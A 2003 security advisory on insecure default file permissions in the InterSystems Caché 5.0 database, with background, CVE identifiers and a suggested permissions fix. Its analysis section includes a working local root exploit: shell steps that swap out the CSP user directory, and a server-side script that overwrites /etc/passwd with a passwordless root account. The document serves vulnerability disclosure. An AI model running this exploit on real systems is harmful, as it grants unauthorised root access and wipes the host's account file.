Title: Cache Database Poor File Permissions Lead To Local Root
Date: March 11, 2003

I. BACKGROUND

"Cache', the post-relational database for e-applications, is optimized for the tougher demands of Web applications. It delivers breakthrough performance for massively scalable Web applications. Its rapid application development environment with advanced object technology lets you operate at Internet speed. Cache's ultra-fast SQL outperforms relational systems 20X. And its multidimensional application and data server delivers lightning-fast performance." (http://www.intersystems.com)

II. DESCRIPTION

The default installation of the Cache database yeilds poorly protected files and directories in the main package tree. Directories and files are open to all users as read write and execute.

III. ANALYSIS

Local attackers can exploit this to manipulate directories and binaries inside the installation tree. This may be used by a local malicious user to gain root access. The content in /cachesys/csp/user is executed as root through the web interface. user's parent directory (csp) is world writeable allowing a local non root user to move user aside, copy its contents and create a new writeable user directory.

  1. mv /cachesys/csp/user /cachesys/csp/user.old
  2. cp -rp /cachesys/csp/user /cachesys/csp/user.old
  3. cp cspexp.csp /cachesys/csp/user
  4. lnyx http://localhost/csp/user/cspexp.csp
  5. su - cache

<------------------cspexp.csp------------->

Intersystems Cache' local root exploit. Larry W. Cashdollar http://vapid.dhs.org

Because of poor default file and directory permissions a localuser can execute code as root via the cache CSP interpreter.


Attempting to overwrite /etc/passwd with cache::0:0:root:/root:/bin/bash.

<script language=Cache runat=server>

     Set cdef=##class(%Library.File).%New("/etc/passwd")
     Do cdef.Open("WSN")
     Do cdef.WriteLine("cache::0:0:root:/root:/bin/bash")
     Do cdef.%Close()

</script>

<----------------snip-------------->

IV. DETECTION

Cache' Database 5.0 is affected. http://www.intersystems.com

V. WORKAROUND

An administrator could possibly change the file permissions to something more restrictive that would not allow any user to manipulate data in the Cache installation directory. I do not know what the affect this would be on the Cache' database functionality.

VI. VENDOR FIX

http://www.intersystems.com/support/flash/index.html

VII. CVE INFORMATION

The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project has assigned the identification numbers to these issues:

CVE IDS: CVE-2003-0497 overwrite Cache using setud cuxs program CVE-2003-0498 code injection into /cachesys/csp

VIII. REFERENCES

http://www.idefense.com/advisory/07.01.03.txt

IX. CREDIT

Larry W. Cashdollar (http://vapid.dhs.org) discovered this vulnerability.